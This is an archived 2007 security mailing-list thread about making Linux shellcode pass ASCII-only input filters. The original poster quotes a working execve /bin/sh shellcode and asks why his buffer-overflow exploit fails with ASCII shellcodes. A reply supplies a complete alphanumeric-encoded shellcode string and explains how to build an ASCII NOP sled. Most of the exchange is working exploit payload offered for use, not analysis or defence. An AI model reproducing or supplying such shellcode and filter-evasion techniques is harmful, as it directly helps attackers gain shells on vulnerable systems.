Vuln Dev
Re: Re: Linux restricted ASCII Shellcode Apr 22 2007 10:42AM
nonexistant nospam org (2 replies)
Re: Linux restricted ASCII Shellcode Apr 23 2007 07:58AM
shadown (shadown gmail com) (1 replies)
Hi,

Here you have your shellcode in ASCII format.

'hAAAAX5AAAAHPPPPPPPPah4A00X5ZnCXPh0A00X50nRYPTYIII19hAA00X5Vb00PTY19hA0
A0X5fpsOPTY19II19I19h0AA0X5OpeFPTY19II19I19h004AX5Bf8sPTY19I19II19h4040X
58Bz8PTYII19h4520X58z9FPTY19I19I19I19h0000X5v7FvPTYI19I19h0AE0X58pzGPTY1
9II19hE000X5ZnFFPTYI19I19h555AX5ZZZUPTY19T'

If the code you are trying to exploit does NOT allow non-ASCII NOPs (that
actually is the only thing that makes sense), instead of '\x90' you will
have to use some ASCII opcode/bytecode string that can be used as a NOP
sled (for example 'A' -> inc ecx).

Cheers,
Sergio

nonexistant (at) nospam (dot) org [email concealed] wrote:
> Yes I'm having a seg-fault, but I can't catch you...
>
> AFAIK when EIP is pointing somewhere in the NOP sled, no matter how the shellcode is aligned... Alignment has nothing to do here...?¿? Am I wrong?
>
> Moreover, I've tried more than 5 different ASCII shellcodes, all with the same result... Always segfaulting. It looks as if the shellcodes were not working for some common reason...
>
> So, summarizing:
>
> 1.- I can perfectly overwrite RET, thus having EIP pointing almost 100% of the time to the NOPs of my shellcode (in an environment variable)
>
> 2.- My -non-ASCII- shellcode works perfectly
>
> 3.- When I try with ANY pure ASCII shellcode, it fails 100% of the time.
>
>
> What is happening?
>
>
> I've tried pure ASCII shellcodes ripped from http://shellcode.org/Shellcode/linux/ascii/ among others...
>
>
> Metasploit framework failed to convert the original shellcode -the one that works- to pure ascii with the selected charset (A-Z,a-z,0-9).
>
>
> That's the original shellcode:
>
>
> \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3
> \x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff
> \xff\xff/bin/sh
>
>
> Is anyone able to convert this to pure ASCII, or give me a working pure ASCII shellcode, or help me understand why all the pure ASCII shellcodes are failing in my exploit?
>
>
> Thank you,
>

--
Sergio Alvarez
Security, Research & Development
IT Security Consultant
email: shadown (at) gmail (dot) com [email concealed]

Re: Linux restricted ASCII Shellcode Apr 23 2007 08:51AM
shadown (shadown gmail com)
Re: Re: Linux restricted ASCII Shellcode Apr 23 2007 03:56AM
Deian Stefan (deianstefan gmail com)
Copyright 2010, SecurityFocus